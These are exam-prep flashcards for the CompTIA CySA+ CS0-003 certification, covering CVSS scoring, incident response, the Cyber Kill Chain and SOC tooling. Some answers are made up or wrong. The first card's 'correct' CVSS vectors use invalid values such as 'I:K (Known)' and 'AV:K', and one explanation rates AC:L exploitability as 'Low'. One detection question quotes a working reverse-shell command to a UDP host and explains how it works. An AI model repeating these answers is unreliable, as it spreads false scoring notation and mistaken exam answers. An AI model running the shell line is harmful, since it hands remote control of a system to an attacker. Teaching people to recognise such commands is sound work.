CS0-003 (FOURPEAT) Flashcards
A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?
A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
Correct Answer: A
A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
Attack Vector (AV): Network (AV:N)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): None (PR:N)
User Interaction (UI): None (UI:N)
Scope (S): Unchanged (S:U)
Confidentiality Impact (C): High (C:H)
Integrity Impact (I): Known (I:K)
Availability Impact (A): Low (A:L)
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
Attack Vector (AV): Adjacent Network (AV:K)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): High (PR:H)
User Interaction (UI): Required (UI:R)
Scope (S): Changed (S:C)
Confidentiality Impact (C): High (C:H)
Integrity Impact (I): High (I:H)
Availability Impact (A): Low (A:L)
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
Attack Vector (AV): Network (AV:N)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): None (PR:N)
User Interaction (UI): Required (UI:H)
Scope (S): Unchanged (S:U)
Confidentiality Impact (C): Low (C:L)
Integrity Impact (I): None (I:N)
Availability Impact (A): High (A:H)
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
Attack Vector (AV): Local (AV:L)
Attack Complexity (AC): Low (AC:L)
Privileges Required (PR): Required (PR:R)
User Interaction (UI): Required (UI:R)
Scope (S): Unchanged (S:U)
Confidentiality Impact (C): High (C:H)
Integrity Impact (I): Low (I:L)
Availability Impact (A): High (A:H)
These vectors provide information about the severity of security vulnerabilities. They consider factors like attack vectors, complexity, privileges required, user interaction, and impact on confidentiality, integrity, and availability.
Which of the following tools would work best to prevent the exposure of PII outside of an organization?
A. PAM
B. IDS
C. PKI
D. DLP
Correct Answer: D
The best tool for preventing the exposure of Personally Identifiable Information (PII) outside of an organization is DLP (Data Loss Prevention).
DLP solutions help monitor, detect, and prevent sensitive data from being leaked or transmitted to unauthorized recipients. They can enforce policies to safeguard PII, such as credit card numbers, Social Security numbers, and other confidential information.
IDS (Intrusion Detection System) detects network threats.
PKI (Public Key Infrastructure) manages digital certificates for secure communication.
PAM (Privileged Access Management) focuses on controlling access to critical systems and accounts.
Which of the following items should be included in a vulnerability scan report? (Choose two.)
A. Lessons learned
B. Service-level agreement
C. Playbook
D. Affected hosts
E. Risk score
F. Education plan
Correct Answer: D, E
D. Affected hosts: Definitely! This information helps pinpoint where vulnerabilities exist.
E. Risk score: Yes, including the risk score provides context on the severity of each vulnerability.
Items like “Lessons learned,” “Service-level agreement,” “Playbook,” and “Education plan” are not typically part of a vulnerability scan report. They might be relevant for other security documentation but aren’t directly related to scan results.
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?
A. A mean time to remediate of 30 days
B. A mean time to detect of 45 days
C. A mean time to respond of 15 days
D. Third-party application testing
Correct Answer: A
Response - Incident response activities include detection, analysis, containment, eradication, recovery, communication, and documentation.
Remediation - Remediation activities include applying patches, fixing misconfigurations, updating security policies, improving access controls, and implementing other corrective measures.
A company’s user accounts have been compromised. Users are also reporting that the company’s internal portal is sometimes only accessible through HTTP, and other times it is accessible through HTTPS. Which of the following most likely describes the observed activity?
A. There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access
B. An on-path attack is being performed by someone with internal access that forces users into port 80
C. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
D. An error was caused by BGP due to new rules applied over the company’s internal routers
Correct Answer: B
Based on the information provided, it seems that option B is the most likely scenario.
An on-path attack by an internal actor could be forcing users to connect via port 80 (HTTP) instead of port 443 (HTTPS). This manipulation could compromise security by intercepting or redirecting traffic. It’s essential for the company to investigate further and take appropriate measures to secure their network and user accounts.
A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:
Security Policy 1006: Vulnerability Management
- The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.
- In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.
- The Company shall prioritize patching of publicly available systems and services over patching of internally available systems.
According to the security policy, which of the following vulnerabilities should be the highest priority to patch?
A. Name: THOR.HAMMER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Internal System
B. Name: CAP.SHIELD -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System
C. Name: LOKI.DAGGER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
External System
D. Name: THANOS.GAUNTLET -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Internal System
Correct Answer: B
CAP.SHIELD
Based on the security policy’s criteria, vulnerabilities B (CAP.SHIELD) and D (THANOS.GAUNTLET) have the highest priority in patching because they have the highest impact on confidentiality, which takes precedence over availability.
B. CAP.SHIELD - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (External System)
Exploitability: Low
Impact: High (Confidentiality)
Patching Priority: Highest
D. THANOS.GAUNTLET - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (Internal System)
Exploitability: Low
Impact: High (Confidentiality)
Patching Priority: Highest
According to the policy, external systems should be prioritized over internal systems.
Therefore, vulnerability B should be addressed first.
Which of the following will most likely ensure that mission-critical services are available in the event of an incident?
A. Business continuity plan
B. Vulnerability management plan
C. Disaster recovery plan
D. Asset management plan
Correct Answer: A
The goal of the business continuity program is to ensure that the organization is able to maintain normal operations even during an unexpected event. When an incident strikes, business continuity controls may protect the business’ core functions from disruption.
The goal of the disaster recovery program is to help the organization quickly recover normal operations if they are disrupted. An incident may cause service disruptions that would trigger the disaster recovery plan.
The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?
A. Deploy a CASB and enable policy enforcement
B. Configure MFA with strict access
C. Deploy an API gateway
D. Enable SSO to the cloud applications
Correct Answer: A
Deploy a CASB and enable policy enforcement (Option A): A Cloud Access Security Broker (CASB) acts as an intermediary between users and cloud services. It provides visibility into cloud usage, enforces security policies, and helps prevent unauthorized access. By deploying a CASB and enforcing policies, you can gain better control over cloud applications and reduce the risk associated with shadow IT.
An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?
A. CDN
B. Vulnerability scanner
C. DNS
D. Web server
Correct Answer: C
Given that the organization was impacted by a DDoS attack, the team should review the DNS logs first. DNS (Domain Name System) logs can provide valuable information about the domain resolution process, including any unusual or malicious requests. Analyzing DNS logs can help identify patterns associated with the attack and provide insights into the source of the traffic. Once the DNS logs have been reviewed, the team can proceed to examine other relevant logs, such as web server logs or CDN logs, to further investigate the incident.
A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?
A. Weaponization
B. Reconnaissance
C. Delivery
D. Exploitation
Correct Answer: D
The current stage of the Cyber Kill Chain that the threat actor is operating in is D. Exploitation. At this stage, the attacker has successfully exploited a vulnerability or weakness to gain unauthorized access to the network. Their goal is to maintain access and continue their attack.
An analyst finds that an IP address outside of the company network is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?
A. Exploitation
B. Reconnaissance
C. Command and control
D. Actions on objectives
Correct Answer: B
The analyst is witnessing the reconnaissance phase. During this stage, attackers gather information about their target, which often includes scanning external-facing assets to identify vulnerabilities. It’s a critical step before launching an attack.
An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two.)
A. Beaconing
B. Domain Name System hijacking
C. Social engineering attack
D. On-path attack
E. Obfuscated links
F. Address Resolution Protocol poisoning
Correct Answer: C, E
- Social Engineering Attack (C): This seems likely. Targeting only administrators with a concealed URL could be an attempt to manipulate them into clicking the link, potentially compromising their credentials or installing malicious software.
- Obfuscated Links (E): Concealing the URL suggests obfuscation. Cybercriminals often use obfuscated links to evade detection by security tools and trick users into visiting malicious sites.
The other options are less relevant in this context. Beaconing (A) typically refers to a compromised system communicating with a command-and-control server. Domain Name System (DNS) hijacking (B) involves redirecting DNS queries to malicious servers. On-path attacks (D) and Address Resolution Protocol (ARP) poisoning (F) are less likely explanations for this scenario.
During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?
A. Conduct regular red team exercises over the application in production
B. Ensure that all implemented coding libraries are regularly checked
C. Use application security scanning as part of the pipeline for the CI/CD flow
D. Implement proper input validation for any data entry form
Correct Answer: C
To mitigate recurring vulnerabilities in a critical application throughout the software development lifecycle (SDLC), the best recommendation is to use application security scanning as part of the pipeline for the CI/CD flow.
Here’s why:
Continuous Integration/Continuous Deployment (CI/CD): Integrating security scanning into the CI/CD pipeline ensures that security checks are performed automatically during each stage of development, from code commits to deployment. This approach catches vulnerabilities early and prevents them from propagating to production.
Automation: By automating security scans, you reduce the reliance on manual testing, which can be error-prone and time-consuming. Automated scans can identify common vulnerabilities (such as injection flaws, cross-site scripting, and insecure configurations) consistently and efficiently.
Shift Left: Incorporating security scanning early in the SDLC (the “shift left” approach) allows developers to address vulnerabilities during coding and testing phases. This proactive approach prevents issues from reaching production.
While options A, B, and D are also important, they address different aspects of security:
A (Red Team Exercises): Useful for assessing overall security posture but not necessarily for identifying specific recurring vulnerabilities.
B (Checking Coding Libraries): Important for maintaining library hygiene but doesn’t directly address the recurring vulnerabilities.
D (Input Validation): Essential for preventing specific types of vulnerabilities (e.g., injection attacks), but it’s not a comprehensive solution for all recurring issues.
An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?
A. Proprietary systems
B. Legacy systems
C. Unsupported operating systems
D. Lack of maintenance windows
Correct Answer: A
The systems that cannot be upgraded due to a vendor appliance represent proprietary systems. These appliances are likely tightly integrated with the critical systems, making it difficult to apply updates or patches.
Unlike legacy systems, which are older but still supported, proprietary systems often lack the flexibility to accommodate standard upgrades.
Unsupported operating systems, on the other hand, refer to those that no longer receive security updates from their vendors.
The issue here seems to be the proprietary nature of the vendor appliance, hindering the necessary upgrades.
Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?
A. Develop a call tree to inform impacted users
B. Schedule a review with all teams to discuss what occurred
C. Create an executive summary to update company leadership
D. Review regulatory compliance with public relations for official notification
Correct Answer: B
Conducting a thorough review involving all relevant teams allows for knowledge sharing, identification of gaps, and process improvements. It promotes collaboration and learning from the incident.
A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?
A. Code analysis
B. Static analysis
C. Reverse engineering
D. Fuzzing
Correct Answer: B
Given the scenario, static analysis is often the first step. It allows the analyst to identify suspicious patterns, check for hardcoded credentials, and understand the binary’s behavior without executing it. If further investigation is needed, reverse engineering becomes valuable.
An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?
A. Hard disk
B. Primary boot partition
C. Malicious files
D. Routing table
E. Static IP address
Correct Answer: D
When preserving sensitive information before isolating a server, the routing table (option D) should be collected first. The routing table contains critical network configuration details, which can help identify potential attack vectors and compromised routes. By capturing this information early, the incident response team can ensure that essential data is preserved for further analysis.
Which of the following security operations tasks are ideal for automation?
A. Suspicious file analysis:
Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder
B. Firewall IoC block actions:
Examine the firewall logs for IoCs from the most recently published zero-day exploit. Take mitigating actions in the firewall to block the behavior found in the logs. Follow up on any false positives that were caused by the block rules
C. Security application user errors:
Search the error logs for signs of users having trouble with the security application. Look up the user’s phone number. Call the user to help with any questions about using the application
D. Email header analysis:
Check the email header for a phishing confidence metric greater than or equal to five. Add the domain of sender to the block list. Move the email to quarantine
Correct Answer: B
Analyzing firewall logs for Indicators of Compromise (IoCs) is a common security task. Automation can efficiently process large log volumes, identify patterns, and trigger blocking rules.
Automation feasibility: Highly feasible (commonly automated).
D could end up adding common email domains to the block list and unintentionally limit legitimate communication.
An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?
A. PCI Security Standards Council
B. Local law enforcement
C. Federal law enforcement
D. Card issuer
Correct Answer: D
Under the terms of the Payment Card Industry Data Security Standard (PCI DSS), an organization that experiences a breach of customer transactions should report the breach to the card issuer.
The card issuer is responsible for handling the incident and notifying the appropriate parties, including law enforcement if necessary.
The other options—such as the PCI Security Standards Council, local law enforcement, and federal law enforcement—may also be involved in the investigation, but the primary reporting responsibility lies with the card issuer.
Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
A. Mean time to detect
B. Number of exploits by tactic
C. Alert volume
D. Quantity of intrusion attempts
Correct Answer: A
Given the recent investments in SIEM (Security Information and Event Management), SOAR (Security Orchestration, Automation, and Response), and a ticketing system, the best metric for an organization to focus on would be the mean time to detect (MTTD).
MTTD measures the average time it takes to identify and respond to security incidents. A shorter MTTD indicates a more efficient detection and response process, which is crucial for minimizing the impact of security threats.
While other metrics (such as alert volume, quantity of intrusion attempts, and number of exploits by tactic) provide valuable insights, MTTD directly reflects the effectiveness of the security infrastructure and processes. It helps organizations assess their ability to detect and mitigate threats promptly.
A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?
A. The current scanners should be migrated to the cloud
B. Cloud-specific misconfigurations may not be detected by the current scanners
C. Existing vulnerability scanners cannot scan IaaS systems
D. Vulnerability scans on cloud environments should be performed from the cloud
Correct Answer: B
Cloud-Specific Misconfigurations: Traditional vulnerability scanners may not fully detect cloud-specific misconfigurations. Cloud environments have unique security challenges, such as misconfigured permissions, network settings, and storage access. Ensure your vulnerability management tools account for these cloud-specific issues.
Migration of Scanners: While migrating your current scanners to the cloud (Option A) is an option, it’s essential to evaluate whether they are optimized for cloud environments. Some scanners may need adjustments or replacements to effectively scan cloud resources.
Vulnerability Scans from the Cloud: Performing vulnerability scans directly from the cloud (Option D) is recommended. This approach ensures that scans originate within the same environment, providing accurate results and minimizing network latency.
Coverage for IaaS Systems: Existing vulnerability scanners can indeed scan IaaS systems (Option C). However, ensure they are configured correctly to assess cloud-based infrastructure. Consider integrating cloud-native security tools for comprehensive coverage.
A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user’s workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?
A. Create a timeline of events detailing the date stamps, user account hostname and IP information associated with the activities
B. Ensure that the case details do not reflect any user-identifiable information. Password-protect the evidence and restrict access to personnel related to the investigation
C. Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation
D. Notify the SOC manager for awareness after confirmation that the activity was intentional
Correct Answer: B
When conducting an investigation related to HR or privacy matters, it’s crucial to handle the process carefully.
Here are some steps to ensure compliance and safeguard privacy:
Privacy and Confidentiality: During investigations, employees have the right to privacy and confidentiality. Information shared during the investigation should only be disclosed on a need-to-know basis. This ensures that sensitive details remain confidential and protects the privacy of all parties involved.
Given the options, B aligns with best practices for maintaining privacy. By ensuring that case details do not include user-identifiable information and restricting access to authorized personnel, you can protect privacy while conducting a thorough investigation.
Which of the following is the first step that should be performed when establishing a disaster recovery plan?
A. Agree on the goals and objectives of the plan
B. Determine the site to be used during a disaster
C. Demonstrate adherence to a standard disaster recovery process
D. Identify applications to be run during a disaster
Correct Answer: A
Agreeing on the goals and objectives of the plan is the first step when establishing a disaster recovery plan (DRP). While conducting a risk analysis is crucial, defining the goals and objectives ensures alignment with business needs and sets the direction for the entire plan. Once you have clear objectives, you can proceed with other essential steps in the DRP process.
A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?
A. Data enrichment
B. Security control plane
C. Threat feed combination
D. Single pane of glass
Correct Answer: D
The security program achieved this improvement by implementing a Single pane of glass approach. By integrating security controls into a SIEM (Security Information and Event Management) system, the analyst no longer needed to switch between multiple tools. This unified view streamlined incident response and reduced Mean Time to Respond (MTTR).
A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?
A. Testing
B. Implementation
C. Validation
D. Rollback
Correct Answer: C
You test the patch in a sandbox environment before you apply it, and after you apply it, you validate.
When starting an investigation, which of the following must be done first?
A. Notify law enforcement
B. Secure the scene
C. Seize all related evidence
D. Interview the witnesses
Correct Answer: B
Securing the scene is typically the first step in an investigation. It ensures that evidence remains undisturbed and allows investigators to proceed methodically. Once the scene is secure, they can then proceed with other steps, such as collecting evidence and interviewing witnesses.
Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?
A. The lead should review what is documented in the incident response policy or plan
B. Management level members of the CSIRT should make that decision
C. The lead has the authority to decide who to communicate with at any time
D. Subject matter experts on the team should communicate with others within the specified area of expertise
Correct Answer: A
The Computer Security Incident Response Team (CSIRT) lead plays a crucial role in determining communication during a security incident.
Here’s how they typically approach it:
Reviewing Incident Response Plan (IRP): The lead should start by reviewing the organization’s incident response policy or plan. This document outlines the procedures, roles, and responsibilities during incidents. It helps guide communication decisions based on predefined protocols.
Analyzing the Incident: The CSIRT analyzes the incident to determine its scope (which users, systems, and services are impacted), its origin (who or what caused the incident), and its occurrence (which attack methods are being used or which vulnerabilities are being exploited).
Internal Communications: The lead manages internal communications during or immediately after incidents, including updates to team members and relevant stakeholders. They work closely with other team leads (e.g., legal, data protection, communications) to ensure effective communication across the organization.
In summary, the CSIRT lead relies on the IRP, collaborates with other teams, and ensures timely and accurate communication throughout the incident response process.
A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?
A. Firewall logs
B. Indicators of compromise
C. Risk assessment
D. Access control lists
Correct Answer: C
Let’s break down the options:
Firewall logs: These logs capture network traffic and can provide insights into attempted connections, blocked traffic, and potential threats. While they are valuable for monitoring network activity, they might not directly produce the high-level executive briefing data needed.
Indicators of compromise (IoCs): IoCs are specific artifacts or patterns associated with known threats (e.g., malicious IP addresses, file hashes, domain names). Collecting IoCs from threat intelligence feeds can help identify potential threats. However, IoCs alone may not provide a comprehensive view for an executive briefing.
Risk assessment: Risk assessments evaluate the likelihood and impact of various threats to an organization. They consider vulnerabilities, threat actors, and potential consequences. Conducting a risk assessment can yield valuable data for an executive briefing, especially when prioritizing security efforts.
Access control lists (ACLs): ACLs define permissions for network resources (e.g., who can access specific servers or services). While ACLs are essential for security, they focus on access control rather than broader threat analysis.
Given the context of creating an executive briefing:
C. Risk assessment is the best choice. It provides a holistic view of threats, vulnerabilities, and their potential impact, aligning well with executive-level decision-making.
An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?
A. Beaconing
B. Cross-site scripting
C. Buffer overflow
D. PHP traversal
Correct Answer: A
The behavior described by the analyst is beaconing. Beaconing refers to a pattern where a compromised device or software communicates with a command-and-control (C2) server at regular intervals, often with additional data or specific patterns in the communication.
In this case, the device is sending HTTPS traffic with extra characters in the header to a known-malicious IP address.
This behavior is typical of beaconing, which allows the attacker to maintain control over the compromised system and receive instructions or updates. The other options (cross-site scripting, buffer overflow, and PHP traversal) are not directly related to this specific behavior.
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?
A. Change the display filter to ftp.active.port
B. Change the display filter to tcp.port==20
C. Change the display filter to ftp-data and follow the TCP streams
D. Navigate to the File menu and select FTP from the Export objects option
Correct Answer: C
The ftp-data display filter specifically captures the data channel of the FTP session, which contains the actual file transfer data.
By following the TCP streams associated with the ftp-data filter, the analyst can reconstruct the entire file transfer, including the files being downloaded.
Options A and B are not relevant in this context:
Option A (ftp.active.port) refers to the active mode port for FTP connections, which is not related to viewing file contents.
Option B (tcp.port==20) filters packets based on the destination port 20, which is used for FTP data connections in active mode. However, this won’t show the complete file transfer data.
Option D is incorrect:
Navigating to the File menu and selecting FTP from the Export objects option allows exporting FTP objects (such as files) from the capture, but it doesn’t directly show the contents of the downloaded files.
A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?
A. SLA
B. MOU
C. NDA
D. Limitation of liability
Correct Answer: A
The SOC (Security Operations Center) manager should review the Service Level Agreement (SLA). The SLA outlines the agreed-upon response times, including how quickly vulnerabilities should be addressed and remediated. It ensures that the team meets contractual obligations related to incident response and vulnerability management. The SLA typically specifies response times for different severity levels of incidents, which helps maintain customer satisfaction and adherence to contractual commitments.
Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
A. Command and control
B. Actions on objectives
C. Exploitation
D. Delivery
Correct Answer: A
The phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target is A. Command and control. During this phase, the attacker establishes a channel for remote control and communication with the compromised system. This allows them to issue commands, exfiltrate data, and maintain persistence.
The Cyber Kill Chain is a framework that explains how attackers move through networks to identify vulnerabilities and exploit them. It’s essential for understanding the stages of a cyberattack and implementing preventive measures. Here are the seven stages:
Reconnaissance: In this initial stage, attackers research potential targets, identify vulnerabilities, and explore existing entry points. Both online and offline methods are used.
Weaponization: After reconnaissance, attackers create malware specifically tailored for the identified target. This could involve modifying existing tools or developing new ones.
Delivery: Cyberweapons are used to infiltrate the target’s network. This can happen through phishing emails with malware attachments or exploiting hardware/software vulnerabilities.
Exploitation: Attackers take advantage of discovered vulnerabilities to further infiltrate the network. They may move laterally across the network to reach their targets.
Installation: Malware is installed on the compromised system, allowing attackers to maintain access and control.
Command and Control (C2): Attackers establish communication channels to control the compromised system remotely. This step enables ongoing operations.
Actions on Objectives: Finally, attackers achieve their goals, which could include data theft, disruption, or other malicious activities.
A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?
A. External
B. Agent-based
C. Non-credentialed
D. Credentialed
Correct Answer: B
Reduced network traffic: Pre-installed agents reduce the need for frequent network scans, replacing them with event-driven or periodic scheduled scans.
No IP limitation: Agent-based scanning is not limited by IP, making it accessible even for assets using dynamic addressing or located off-site behind private subnets.
Geographically distributed environments: Agent-based scanning works well in widely distributed environments or with numerous remote employees.
A security analyst detects an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?
A. RCE
B. Reverse shell
C. XSS
D. SQL injection
Correct Answer: B
sh -i: This part of the command invokes the Bourne shell (sh) with an interactive session (-i).
>& /dev/udp/10.1.1.1/4821: The >& redirects both standard output and standard error to the specified UDP address (10.1.1.1) and port (4821).
0>$l: This redirects standard input (0) to an undefined variable ($l).
In a reverse shell attack, the attacker sets up a listener on their machine (in this case, the UDP address 10.1.1.1), and the compromised system connects back to the attacker, allowing them to execute commands remotely.
An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?
A. Scope
B. Weaponization
C. CVSS
D. Asset value
Correct Answer: B
Weaponization refers to the actual use of an exploit to deliver a payload or cause harm.
In this case, the exploit being actively used to deliver ransomware significantly increases the severity of the vulnerability.
Other factors, such as scope, CVSS (Common Vulnerability Scoring System), and asset value, may also play a role, but weaponization is the primary reason for the score escalation.
A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?
A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning
Correct Answer: C
Agent-based scanning involves installing a lightweight software agent on each endpoint. These agents perform the vulnerability assessment locally on the device, thereby not requiring remote access to sensitive data. The results are then sent back to a centralized server for analysis.
A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?
A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
B. function x() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $5}') && echo "$1 | $info" }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }
D. function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }
Correct Answer: D
To identify anomalies on the network routing accurately, the security analyst should use a function that can help in gathering information related to the network routing of a given IP address. Among the provided options, the most suitable function for this purpose is:
D. function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }
Explanation:
This function uses the traceroute command with a maximum hop count of 40 to trace the route to the target IP address.
The awk 'END{print $1}' command is used to extract the last hop or router in the route, which can be valuable for identifying anomalies or unexpected routing paths.
Finally, it echoes the target IP address and the last hop/router in the route as output, which can help the analyst identify any unexpected or suspicious routing behavior.
There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?
A. Implement step-up authentication for administrators
B. Improve employee training and awareness
C. Increase password complexity standards
D. Deploy mobile device management
Correct Answer: B
While other options (such as step-up authentication for administrators, password complexity standards, and mobile device management) are important for overall security, they may not directly address the specific issue of sensitive information leakage via file sharing services. Employee awareness and training, on the other hand, directly mitigate this risk by promoting responsible behavior and informed decision-making.
A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?
A. Upload the binary to an air gapped sandbox for analysis
B. Send the binaries to the antivirus vendor
C. Execute the binaries on an environment with internet connectivity
D. Query the file hashes using VirusTotal
Correct Answer: A
This approach allows the analyst to analyze the binaries without exposing them to the internet, ensuring that no information is inadvertently revealed to the attackers.
By using an air-gapped environment, the analyst can safely examine the malware’s behavior and characteristics while maintaining confidentiality.
The other options (sending binaries to an antivirus vendor, executing them in an internet-connected environment, or querying file hashes using VirusTotal) may inadvertently leak information or compromise the investigation.
So, option A is the most suitable choice in this scenario.
Which of the following is the best way to begin preparation for a report titled “What We Learned” regarding a recent incident involving a cybersecurity breach?
A. Determine the sophistication of the audience that the report is meant for
B. Include references and sources of information on the first page
C. Include a table of contents outlining the entire report
D. Decide on the color scheme that will effectively communicate the metrics
Correct Answer: A
Understanding your audience’s level of expertise and familiarity with cybersecurity concepts will help tailor the content appropriately. Once you have that clarity, you can proceed with creating an effective report.
Which of the following would help to minimize human engagement and aid in process improvement in security operations?
A. OSSTMM
B. SIEM
C. SOAR
D. OWASP
Correct Answer: C
SOAR (Security Orchestration, Automation, and Response) provides automation, orchestration, and predictive capabilities to strengthen security operations and reduce reliance on manual processes. It is a powerful tool for minimizing human engagement and improving efficiency.
Which of the following is an important aspect that should be included in the lessons-learned step after an incident?
A. Identify any improvements or changes in the incident response plan or procedures
B. Determine if an internal mistake was made and who did it so they do not repeat the error
C. Present all legal evidence collected and turn it over to law enforcement
D. Discuss the financial impact of the incident to determine if security controls are well spent
Correct Answer: A
A. This is crucial. After an incident, it’s essential to evaluate what went well and what could be improved. Adjustments to the incident response plan or procedures can enhance future incident handling.
B. While identifying internal mistakes is important, the primary focus should be on learning and preventing recurrence rather than assigning blame. Understanding the root cause helps prevent similar errors.
C. This step is relevant for legal and law enforcement purposes. It ensures that evidence is properly documented and handed over to the appropriate authorities.
D. While financial impact assessment is valuable, it’s not typically part of the lessons-learned process. However, it’s essential for overall security management.
The most relevant choice for the lessons-learned step is option A. Identifying improvements and changes ensures continuous improvement in incident response.
After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?
A. Avoid
B. Transfer
C. Accept
D. Mitigate
Correct Answer: A
The Chief Information Security Officer (CISO) in this scenario selected the “Avoid” risk management principle. By refusing the software request due to a high risk score, the CISO is actively avoiding the potential risks associated with implementing the software.
Other risk management principles include transferring (such as through insurance or outsourcing), accepting (acknowledging and managing the risk), and mitigating (reducing the impact of the risk).
The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?
A. Single pane of glass
B. Single sign-on
C. Data enrichment
D. Deduplication
Correct Answer: A
Single Pane of Glass (SPOG): This concept refers to a unified dashboard or interface that aggregates information from various sources into a single view. By using a SPOG, your security operations team can access and analyze threat intelligence data from multiple feeds without switching between different tools or portals. It streamlines workflows, reduces redundancy, and enhances efficiency.
